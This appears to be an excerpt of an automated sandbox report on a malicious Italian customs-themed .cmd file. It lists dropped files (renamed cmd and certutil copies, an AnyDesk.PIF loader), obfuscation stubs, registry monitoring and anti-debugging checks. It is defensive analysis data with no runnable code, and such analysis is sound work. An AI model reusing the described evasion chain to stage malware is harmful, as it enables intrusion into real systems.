      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: winmm.dll
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
      Source: Window Recorder Window detected: More than 3 window changes detected
      Source: Documentazione_Doganale_richieste_di_copia.cmd Static file information: File size 3584667 > 1048576
      Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 00000009.00000003.1719853566.000000007FA90000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1720758818.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2942456888.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1694923446.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1698590707.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1703554618.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1717188834.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1718131539.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1719120301.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1719455704.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1720271096.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
      Source: Binary string: certutil.pdb source: kn.exe, 00000006.00000000.1699078959.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1702405563.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1704266482.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1716584582.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
      Source: Binary string: cmd.pdb source: alpha.exe, 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1694923446.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1698590707.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1703554618.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1717188834.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1718131539.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1719120301.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1719455704.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1720271096.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
      Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 00000009.00000003.1720468167.0000000002927000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1719853566.000000007FA90000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1720758818.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2942456888.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2941867830.0000000002921000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000000.1699078959.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1702405563.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1704266482.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1716584582.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr

      Data Obfuscation

      Source: Yara match File source: 9.2.AnyDesk.PIF.2b60000.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 00000009.00000003.1720758818.000000007F880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: alpha.exe.2.dr Static PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B7894C LoadLibraryW,GetProcAddress,FreeLibrary, 9_2_02B7894C
      Source: alpha.exe.2.dr Static PE information: section name: .didat
      Source: kn.exe.4.dr Static PE information: section name: .didat
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF67C4E3668 push rsp; ret 6_2_00007FF67C4E3669
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B8D2FC push 02B8D367h; ret 9_2_02B8D35F
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B663B0 push 02B6640Bh; ret 9_2_02B66403
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B663AE push 02B6640Bh; ret 9_2_02B66403
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B6332C push eax; ret 9_2_02B63368
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B8C378 push 02B8C56Eh; ret 9_2_02B8C566
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B6C349 push 8B02B6C1h; ret 9_2_02B6C34E
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B8D0AC push 02B8D125h; ret 9_2_02B8D11D
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B7306C push 02B730B9h; ret 9_2_02B730B1
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B7306B push 02B730B9h; ret 9_2_02B730B1
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B8D1F8 push 02B8D288h; ret 9_2_02B8D280
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B7F108 push ecx; mov dword ptr [esp], edx 9_2_02B7F10D
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B8D144 push 02B8D1ECh; ret 9_2_02B8D1E4
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B66784 push 02B667C6h; ret 9_2_02B667BE
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B66782 push 02B667C6h; ret 9_2_02B667BE
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B6D5A0 push 02B6D5CCh; ret 9_2_02B6D5C4
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B8C570 push 02B8C56Eh; ret 9_2_02B8C566
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B6C56C push ecx; mov dword ptr [esp], edx 9_2_02B6C571
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B7AAE0 push 02B7AB18h; ret 9_2_02B7AB10
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B7AADF push 02B7AB18h; ret 9_2_02B7AB10
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B78AD8 push 02B78B10h; ret 9_2_02B78B08
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B6CA4E push 02B6CD72h; ret 9_2_02B6CD6A
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B6CBEC push 02B6CD72h; ret 9_2_02B6CD6A
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B7886C push 02B788AEh; ret 9_2_02B788A6
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02BD4850 push eax; ret 9_2_02BD4920
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B7790C push 02B77989h; ret 9_2_02B77981
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B76946 push 02B769F3h; ret 9_2_02B769EB
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B76948 push 02B769F3h; ret 9_2_02B769EB
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B75E7C push ecx; mov dword ptr [esp], edx 9_2_02B75E7E
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B72F60 push 02B72FD6h; ret 9_2_02B72FCE

      Persistence and Installation Behavior

      Source: C:\Users\Public\kn.exe File created: C:\Users\Public\Libraries\AnyDesk.PIF
      Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
      Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\kn.exe

      Boot Survival

      Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
      Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\kn.exe
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 9_2_02B7AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 9_2_02B7AB1C
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
      Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\Public\alpha.exe Evaded block: after key decision
      Source: C:\Users\Public\alpha.exe API coverage: 8.3 %
      Source: C:\Users\Public\alpha.exe API coverage: 8.6 %
      Source: C:\Users\Public\kn.exe API coverage: 0.8 %
      Source: C:\Users\Public\alpha.exe API coverage: 9.6 %
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF7E1DC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 3_2_00007FF7E1DC823C
      Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF7E1DC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 3_2_00007FF7E1DC2978
      Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF7E1DB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 3_2_00007FF7E1DB35B8
      Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF7E1DB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 3_2_00007FF7E1DB1560
      Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF7E1DD7B4C FindFirstFileW,FindNextFileW,FindClose, 3_2_00007FF7E1DD7B4C
      Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF7E1DC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 5_2_00007FF7E1DC823C
      Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF7E1DC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 5_2_00007FF7E1DC2978
      Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF7E1DB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 5_2_00007FF7E1DB35B8
      Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF7E1DB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 5_2_00007FF7E1DB1560
      Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF7E1DD7B4C FindFirstFileW,FindNextFileW,FindClose, 5_2_00007FF7E1DD7B4C
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF67C535E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose, 6_2_00007FF67C535E58
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF67C5919F8 #359,FindFirstFileW,FindNextFileW,FindClose, 6_2_00007FF67C5919F8
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF67C591B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359, 6_2_00007FF67C591B04
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF67C53DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose, 6_2_00007FF67C53DBC0
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF67C573674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359, 6_2_00007FF67C573674
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF67C53B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357, 6_2_00007FF67C53B3D8
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF67C53D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle, 6_2_00007FF67C53D4A4
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF67C4FD440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree, 6_2_00007FF67C4FD440
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF67C596F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357, 6_2_00007FF67C596F80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C593100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF67C593100
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5910C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF67C5910C4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,6_2_00007FF67C52C6F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,6_2_00007FF67C59234C
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B65908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,9_2_02B65908
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF7E1DC823C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF7E1DC2978
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF7E1DB35B8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF7E1DB1560
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DD7B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF7E1DD7B4C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,6_2_00007FF67C57511C
      Source: AnyDesk.PIF, 00000009.00000002.2940156410.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2940156410.0000000000892000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\Public\Libraries\AnyDesk.PIFAPI call chain: ExitProcess graph end node

      Anti Debugging

      Source: C:\Users\Public\Libraries\AnyDesk.PIF | Code function: 9_2_02B7F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,9_2_02B7F744
      Source: C:\Users\Public\Libraries\AnyDesk.PIF | Process queried: DebugPort
      Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF7E1DD63FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,3_2_00007FF7E1DD63FC
